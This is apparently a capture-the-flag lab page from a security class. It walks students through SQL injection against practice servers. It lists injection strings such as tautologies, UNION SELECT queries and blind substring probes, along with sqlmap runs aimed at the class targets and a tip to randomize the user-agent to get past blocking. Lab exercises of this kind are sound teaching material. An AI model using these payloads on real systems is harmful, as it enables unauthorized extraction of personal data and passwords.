Purple Team 3: SQLI Challenges
1. Essential SQL Commands
First, click here to reset the server.
Try these commands to see how SQL works.
- SHOW DATABASES
- SHOW TABLES
- SELECT 1
- SELECT "peanut"
- SELECT concat("peanut", "butter")
- SELECT substr("peanut", 2, 2)
- SELECT substr("peanut", 2, 1) = 'e'
- SELECT substr("peanut", 2, 1) = 'a'
- SELECT * FROM employees
- SELECT id FROM employees
- SELECT id, 2 FROM employees
- SELECT name, id FROM employees WHERE id=1
- SELECT concat(name, id) FROM employees WHERE id=1 OR 'cat'='dog' OR 2=2
- INSERT INTO employees ( id, name, ssn ) VALUES ( 4, 'Kevin', '999-99-9999');
- SELECT * from information_schema.tables
- SELECT TABLE_NAME from information_schema.tables
- SELECT * from information_schema.columns
- SELECT COLUMN_NAME from information_schema.columns
1.1: SSN (5 pts)
The flag is Steve Jobs' SSN.
1.2: YOUNG_MAKE (10 pts)
Find the data shown below.
The flag is covered by a green box.
2. Simple SQLi
First, click here to reset the server.
Search for these names:
- Bill Gates
- Tip O'Neil
- Sam
- Sam' or 1=1 #
- Sam' or 'a'='a
- Sam' UNION SELECT 1 #
2.1: SSN (15 pts)
The flag is Linus' SSN.
2.2: Password (20 pts)
The flag is Steve Jobs' password.
2.3: Sqlmap (10 pts)
Use
Sqlmap on this target:
http://ad.samsclass.info/sqli/chal2.php?u=x
The flag is the username, covered by a green box in the image below.
Hint: if you get "forbidden" errors, try randomizing the user-agent
2.4: Sqlmap (20 pts)
First, click here to reset the server.
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is in the output, covered by a green box in the image below.
Warning: I used version {1.3#stable} -- a later version may not show the
flag value.
2.5: Sqlmap (20 pts)
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is Steve Jobs' SSN.
2.6: Sqlmap (20 pts)
Use Sqlmap on this target:
https://games.samsclass.info/sqli/chal2a.php?u=Steve%20Jobs
The flag is the number indicating the highest-privilege user.
3. Blind SQLi
First, click here to reset the server.
Try these values:
- Bill Gates
- x
- x' or 'a'='a
- x' or 'b'='a
- x' or 'a'='a'#
- x' or LENGTH(database())=1 #
3.1 Database Name Length (5 pts)
The flag is the length of the database's name.
3.2 SSN (10 pts)
Try these values:
- x' UNION select 1#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='B'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)='A'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND substr(name, 1, 1)>'A'#
- x' UNION SELECT name FROM employees WHERE name='Bill Gates' AND length(name)>2#
The flag is the first three digits of Bill Gates' SSN.
3.3 ID (5 pts)
The flag is admin's ID.
3.4 Length (5 pts)
The flag is the length of Bill Gates' password.
3.5 Bill's Password (20 pts)
The flag is Bill Gates' password.
3.6 Password (30 pts)
The flag is admin's password.
Updated 5-20-19
Hint about user-agent added 5-21-19